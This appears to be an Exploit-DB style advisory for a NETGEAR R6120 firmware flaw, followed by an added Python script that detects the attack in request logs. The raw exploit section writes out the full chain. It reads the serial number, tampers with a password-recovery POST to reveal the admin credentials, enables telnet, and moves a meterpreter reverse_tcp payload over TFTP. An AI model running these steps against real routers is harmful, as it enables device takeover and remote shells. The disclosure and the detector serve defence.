Vendor: R6120
By: Wadeek
CVSS: 8.8 (HIGH)
Type: Credential Disclosure
CWE: 200
Product Name: R6120
Affected Version From: 1.0.0.30
Affected Version To: 1.0.0.30
Patch Exists: YES
Related CWE: N/A
CPE: h:netgear:r6120
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux, MIPSLE
Year: 2018

NETGEAR WiFi Router R6120 – Credential Disclosure

An authenticated Telnet command execution vulnerability exists in the NETGEAR WiFi Router R6120 with firmware version 1.0.0.30. An attacker can exploit it by sending a POST request to http://192.168.1.1/401_recovery.htm that contains the router's serial number, a value the router already exposes without authentication in its UPnP device description (rootDesc.xml). This bypasses the password-recovery security questions and discloses the router admin username and password. With those credentials the attacker can telnet into the router and execute commands.

Mitigation:

Users should update their router firmware to the latest version available from the vendor.

Exploit-DB raw data:

# Exploit Title: NETGEAR WiFi Router R6120 - Credential Disclosure
# Date: 2018-10-28
# Exploit Author: Wadeek
# Hardware Version: R6120
# Firmware Version: 1.0.0.30
# Vendor Homepage: https://www.netgear.com/support/product/R6120.aspx
# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6120/R6120-V1.0.0.30.zip

# == Files Containing Juicy Info ==
>> http://192.168.1.1:56688/rootDesc.xml (Server:  Unspecified, UPnP/1.0, Unspecified)
<serialNumber>SSSSSSSNNNNNN</serialNumber>

# == Security Questions Bypass > Password Disclosure ==
>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
<POST REQUEST>
htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
(replace)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
(by)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=passwordrecovered.htm&SID=
<POST RESPONSE>
">You have successfully recovered the admin password.</span>
">Router Admin Username</span>:&nbsp;admin</td>
">Router Admin Password</span>:&nbsp;Str0ng+-Passw0rd</td>

# == Authenticated Telnet Command Execution ==
>> http://admin:Str0ng+-Passw0rd@192.168.1.1/setup.cgi?todo=debug
:~$ telnet 192.168.1.1
R6120 login: admin
Password: Str0ng+-Passw0rd
{
upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
}
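Added detection example, not part of the Exploit-DB entry or of NETGEAR's firmware: it scans HTTP request records for the two patterns the advisory documents, a recovery POST whose next_file skips the security-questions page and a request that enables the debug (telnet) interface, and generalises the first check to any next_file other than securityquestions.htm. The log format ("client METHOD target [body]") and the log lines are constructed assumptions; the R6120 itself does not emit such a log, so this is meant for a proxy or network sensor in front of the admin interface.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample records in an assumed "client METHOD target [body]" format.
# Client 10.0.0.5 follows the legitimate recovery flow; 10.0.0.9 does not.
SAMPLE_LOG = """\
10.0.0.5 GET /401_recovery.htm
10.0.0.5 POST /htpwd_recovery.cgi?id=123 dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
10.0.0.9 POST /htpwd_recovery.cgi?id=456 dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=passwordrecovered.htm&SID=
10.0.0.9 GET /setup.cgi?todo=debug
10.0.0.9 GET /rootDesc.xml
"""

LINE_RE = re.compile(r"^(?P<client>\S+) (?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<body>\S+))?$")


def parse_record(line):
    """Split one assumed-format log line into client, method, path, query and body dicts."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m["target"])
    return {
        "client": m["client"],
        "method": m["method"],
        "path": url.path,
        "query": {k: v[0] for k, v in parse_qs(url.query).items()},
        "body": {k: v[0] for k, v in parse_qs(m["body"] or "").items()},
    }


def classify(rec):
    """Return a finding label for one record, or None if it looks benign."""
    if rec["method"] == "POST" and rec["path"].endswith("/htpwd_recovery.cgi"):
        body = rec["body"]
        # The legitimate flow moves from the serial check to securityquestions.htm;
        # a verify_sn step that names any other next_file is the advisory's bypass.
        if body.get("todo") == "verify_sn" and body.get("next_file") != "securityquestions.htm":
            return "recovery-flow-bypass"
    if rec["path"].endswith("/setup.cgi") and rec["query"].get("todo") == "debug":
        return "telnet-debug-enable"
    return None


def scan(log_text):
    """Return (client, label) pairs in log order for every suspicious record."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is not None and (label := classify(rec)):
            findings.append((rec["client"], label))
    return findings


if __name__ == "__main__":
    for client, label in scan(SAMPLE_LOG):
        print(client, label)
```

A client that produces both labels in sequence has most likely completed the whole chain and should be treated as having the admin credentials.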